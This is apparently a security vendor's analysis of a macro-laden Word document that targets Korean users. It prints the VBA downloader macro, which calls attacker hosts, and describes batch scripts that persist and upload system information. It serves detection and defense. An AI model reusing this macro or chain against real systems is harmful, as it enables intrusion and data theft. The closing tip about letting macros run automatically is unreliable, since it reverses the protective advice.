Word File Disguised as a Design Modification Request for Information Theft

The ASEC analysis team has discovered the distribution of malicious Word file targeting Korean users. The filename is Design Modification Request.doc, and it includes an image that prompts the user to run the macro.

Figure 1. Image in the Word file

 

Figure 2. File information of Design Modification Request.doc

 

As shown below, the Word file includes a malicious macro that downloads additional files from hxxp://filedownloaders.com/doc09. When the user clicks Enable Content, the macro is automatically run, and it downloads additional malicious files.

Sub Document_Open()
    Dim RetVal As Long

    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)

    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

It then runs the downloaded temp.doc document file. The Word file contains texts to disguise as a Korean company.

Figure 3. Text within temp.doc

 

Figure 4. Information of temp.doc file

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

no1.bat that was run via the Word file runs vvire.bat. If vvire.bat does not exist, it decompresses the setup.cab file that was downloaded from hxxp://filedownloaders.com/doc09/vbs6.txt, then runs vvire.bat.

Figure 3. Inside no1.bat file

vvire.bat performs the feature of adding to registry, running the no4.bat file, and downloading additional files.

Figure 4. Inside vvire.bat

 

It adds the Start.vbs file to registry so that the vvire.bat file is run automatically, and after running no4.bat, it deletes no1.bat. It then checks to see if a certain file exists and downloads additional files from hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt and runs them. This file cannot be checked as it is currently unavailable for download.

The figure below is Start.vbs file.

Figure 5. Inside star.vbs

 

no4.bat that was run via vvire.bat performs the feature of collecting information of the user PC below and leaking it to hxxp://senteroman.com/upl11/upload.php.

• C:\Users\%username%\downloads\ list
• C:\Users\%username%\documents\ list
• C:\Users\%username%\desktop\ list
• C:\Program Files\ list
• IP information
• tasklist
• systeminfo

Upon running no4.bat, files with collected information are created in the C:\Users\Public\Documents\ folder, and when the collected information is uploaded, it creates the upok.txt file.

Figure 6. List of created files

 

As malicious document files that impersonate normal users to prompt users to enable macro such as this malware are consistently being distributed, users must stay vigilant. Also, users should change settings so that the macro inside the document will run automatically, and refrain from opening suspicious documents.

[V3 Detection]

• Downloader/DOC.Generic

MD5

66384f5091583b0c389918d5c8522cd6

d2732f2c6f8531e812053e6252c421cf

d6358ce7399df51138f89c74f408c5a9

dc7fda2a036016cca23f2867e644682c

URL

http[:]//senteroman[.]com/upl11/upload[.]php